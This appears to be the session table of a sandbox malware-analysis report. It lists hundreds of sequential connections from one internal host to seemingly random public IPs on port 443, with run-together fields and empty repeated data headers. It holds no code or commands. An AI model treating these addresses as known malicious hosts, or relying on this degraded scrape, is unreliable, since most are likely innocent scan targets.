                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13760192.168.2.23475209.200.12.39443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13761192.168.2.2355602165.115.144.219443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13762192.168.2.2344930109.127.72.154443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13763192.168.2.2348926132.73.225.77443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13764192.168.2.234795212.51.142.191443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13765192.168.2.2341480137.90.155.125443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13766192.168.2.2332854138.137.206.154443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13767192.168.2.2342904165.52.233.47443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13768192.168.2.234711658.121.160.202443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13769192.168.2.2352268178.173.156.15443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13770192.168.2.235911419.116.159.70443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13771192.168.2.2355566151.52.89.49443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13772192.168.2.2349728125.3.83.241443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13773192.168.2.2357590107.209.145.181443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13774192.168.2.233601018.199.144.209443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13775192.168.2.2333882114.91.188.101443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13776192.168.2.2340614164.137.75.30443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13777192.168.2.235456259.100.88.205443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13778192.168.2.2353570155.241.195.82443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13779192.168.2.2336546160.147.8.133443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13780192.168.2.234083465.205.191.53443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13781192.168.2.234301877.135.189.7443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13782192.168.2.234929683.75.153.104443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13783192.168.2.2337776126.73.113.98443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13784192.168.2.234646064.56.23.99443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13785192.168.2.23418721.44.67.218443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13786192.168.2.234122240.71.174.18443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13787192.168.2.234907232.205.254.222443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13788192.168.2.2333702223.71.237.192443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13789192.168.2.233359653.206.12.209443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13790192.168.2.2355946185.83.108.174443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13791192.168.2.2335078150.34.181.89443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13792192.168.2.2348158129.69.225.249443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13793192.168.2.2333524173.84.81.217443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13794192.168.2.2335440197.107.165.128443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13795192.168.2.2351222109.126.65.4443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13796192.168.2.23393249.201.197.45443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13797192.168.2.235948662.61.192.154443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13798192.168.2.233833258.247.8.133443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13799192.168.2.2349054135.250.135.92443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13800192.168.2.233890248.102.58.201443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13801192.168.2.2341662204.215.180.18443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13802192.168.2.2341974222.248.54.106443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13803192.168.2.2351238181.67.143.6443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13804192.168.2.2360578137.185.76.180443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13805192.168.2.235981841.1.186.33443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13806192.168.2.233767035.217.177.100443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13807192.168.2.235462017.109.242.187443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13808192.168.2.234468444.109.250.28443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13809192.168.2.233545491.75.28.167443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13810192.168.2.2348314186.41.200.216443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13811192.168.2.2340600142.100.20.252443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13812192.168.2.2358924140.119.28.15443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13813192.168.2.23524968.204.133.215443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13814192.168.2.2360056149.160.253.14443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13815192.168.2.234765040.44.225.41443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13816192.168.2.2333750172.197.72.160443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13817192.168.2.2336240216.123.242.60443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13818192.168.2.234274894.192.39.193443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13819192.168.2.2339640146.55.47.255443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13820192.168.2.2354594167.24.148.144443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13821192.168.2.2336984107.233.202.191443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13822192.168.2.2354072192.228.72.254443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13823192.168.2.235283687.130.170.75443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13824192.168.2.2344410198.91.197.209443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13825192.168.2.235878417.72.153.216443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13826192.168.2.2342648120.170.205.182443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13827192.168.2.2332838201.221.167.251443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13828192.168.2.2356780107.37.224.78443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13829192.168.2.235896848.125.110.145443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13830192.168.2.2346020137.62.95.101443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13831192.168.2.2350062155.55.73.69443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13832192.168.2.235647024.140.147.47443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13833192.168.2.234711077.189.254.140443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13834192.168.2.2336418158.28.2.2443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13835192.168.2.2335116184.241.49.198443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13836192.168.2.2358202121.198.143.50443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13837192.168.2.233800062.73.89.209443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13838192.168.2.235378689.176.18.187443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13839192.168.2.2355120206.149.216.137443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13840192.168.2.2352744117.81.177.89443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13841192.168.2.235179823.221.222.144443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13842192.168.2.2347216109.22.216.14443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13843192.168.2.233483054.227.97.216443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13844192.168.2.2345108128.45.180.200443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13845192.168.2.2346822102.178.143.73443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13846192.168.2.2353532154.251.173.118443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13847192.168.2.2344116178.84.38.23443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13848192.168.2.2346190223.83.85.177443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13849192.168.2.2354270162.94.94.17443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13850192.168.2.233716658.173.41.207443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13851192.168.2.2334602109.62.155.145443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13852192.168.2.2336734156.57.251.134443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13853192.168.2.233981418.145.157.238443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13854192.168.2.2338730222.35.107.137443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13855192.168.2.2347358113.86.16.250443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13856192.168.2.2355640195.247.96.242443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13857192.168.2.2350896192.123.184.53443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13858192.168.2.233615832.243.24.130443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13859192.168.2.2345636200.166.121.203443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13860192.168.2.2338320161.51.240.249443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13861192.168.2.23550721.83.43.254443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13862192.168.2.2341148148.178.136.230443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13863192.168.2.2333680129.216.105.220443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13864192.168.2.235521043.234.87.22443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13865192.168.2.236071823.252.174.246443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13866192.168.2.2341688183.118.114.150443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13867192.168.2.234712031.179.170.255443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13868192.168.2.2345866165.92.200.120443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13869192.168.2.233620282.136.37.189443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13870192.168.2.2356384207.141.245.253443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13871192.168.2.2351962109.149.87.63443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13872192.168.2.235226467.184.201.191443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13873192.168.2.2340814120.148.73.157443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13874192.168.2.2340330149.182.8.228443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13875192.168.2.235206652.124.30.159443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13876192.168.2.2335512207.77.72.24443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13877192.168.2.233794693.71.47.136443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13878192.168.2.233406835.147.242.110443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13879192.168.2.2348454147.1.216.54443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13880192.168.2.2339524110.135.18.118443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13881192.168.2.2345370219.145.4.182443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13882192.168.2.2341942194.125.205.121443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13883192.168.2.2347828192.179.124.82443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13884192.168.2.234213051.86.252.35443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13885192.168.2.235018488.246.43.62443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13886192.168.2.235545445.111.15.212443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13887192.168.2.235431253.33.254.163443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13888192.168.2.235261878.110.123.134443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13889192.168.2.234363064.46.147.90443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13890192.168.2.2357686116.86.30.34443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13891192.168.2.235166677.180.215.247443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13892192.168.2.234369897.10.214.35443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13893192.168.2.2333712132.231.213.45443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13894192.168.2.2340582118.183.108.208443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13895192.168.2.2336028176.219.237.160443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13896192.168.2.2339118117.228.13.3443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13897192.168.2.2353812160.12.78.23443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13898192.168.2.2352564119.111.237.216443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13899192.168.2.233466418.124.254.222443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13900192.168.2.2349362144.77.229.65443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13901192.168.2.2343618207.251.116.227443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13902192.168.2.234502244.108.45.123443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13903192.168.2.2359646133.232.78.220443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13904192.168.2.233821884.30.143.64443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13905192.168.2.235009861.231.70.33443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13906192.168.2.234127263.191.254.108443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13907192.168.2.235145027.12.189.240443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13908192.168.2.234762698.108.171.122443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13909192.168.2.2357978136.239.62.222443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13910192.168.2.2345224109.179.238.34443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13911192.168.2.234879661.1.57.131443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13912192.168.2.235603876.0.252.155443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13913192.168.2.233920692.190.176.240443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13914192.168.2.2348650147.95.16.240443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13915192.168.2.233613679.165.82.199443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13916192.168.2.2359656192.142.115.140443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13917192.168.2.235019284.57.243.61443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13918192.168.2.2357048209.247.117.193443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13919192.168.2.23537945.170.59.155443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13920192.168.2.235211660.91.164.204443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13921192.168.2.235720082.105.219.239443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13922192.168.2.2339348208.236.18.143443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13923192.168.2.235437275.243.215.108443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13924192.168.2.2344594113.153.12.161443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13925192.168.2.2336808153.141.196.0443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13926192.168.2.2339168102.159.80.15443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13927192.168.2.233450649.213.241.52443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13928192.168.2.2342832116.103.197.76443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13929192.168.2.234988283.220.19.230443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13930192.168.2.23347324.11.175.16443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13931192.168.2.235704286.100.63.251443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13932192.168.2.235635437.96.223.112443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13933192.168.2.234222089.192.210.85443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13934192.168.2.2343928125.136.90.71443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13935192.168.2.235861636.201.69.96443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13936192.168.2.2337818106.32.133.169443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13937192.168.2.2338530158.210.221.5443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13938192.168.2.2349996133.234.150.218443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13939192.168.2.2359398160.18.148.201443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13940192.168.2.234654266.124.194.170443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13941192.168.2.2349878176.133.130.40443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13942192.168.2.2352340163.144.50.27443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13943192.168.2.235656891.61.137.203443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13944192.168.2.2348046100.54.227.206443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13945192.168.2.2338074196.73.22.41443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13946192.168.2.2346554199.69.110.229443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13947192.168.2.2345630183.227.91.7443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13948192.168.2.2342706113.249.149.18443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13949192.168.2.234046290.83.147.64443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13950192.168.2.2338062115.188.40.187443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13951192.168.2.235243434.145.4.246443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13952192.168.2.2347288195.115.97.240443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13953192.168.2.2333308107.28.241.156443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13954192.168.2.235458093.170.167.205443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13955192.168.2.2342310129.54.195.182443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13956192.168.2.2359388198.124.36.127443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13957192.168.2.2346270125.146.195.108443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13958192.168.2.2356214172.207.169.12443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13959192.168.2.234778076.25.200.232443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13960192.168.2.235979264.93.190.18443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13961192.168.2.2335054170.236.153.116443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13962192.168.2.2352342166.30.167.67443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13963192.168.2.2339200191.181.7.247443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13964192.168.2.234729623.150.104.16443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13965192.168.2.2333114126.196.126.227443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13966192.168.2.2347082199.31.92.132443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13967192.168.2.2345666108.32.255.166443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13968192.168.2.2349254126.63.77.31443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13969192.168.2.2347840162.20.219.163443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13970192.168.2.235042414.137.196.106443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13971192.168.2.2344282212.117.106.243443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13972192.168.2.2337378108.67.179.89443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13973192.168.2.2338574180.45.159.15443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13974192.168.2.233442884.169.1.207443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13975192.168.2.2345704201.20.93.247443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13976192.168.2.2336442116.76.117.50443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13977192.168.2.2345238187.55.75.194443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13978192.168.2.2359054122.63.12.198443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13979192.168.2.234723065.250.197.144443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13980192.168.2.2349090113.167.126.43443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
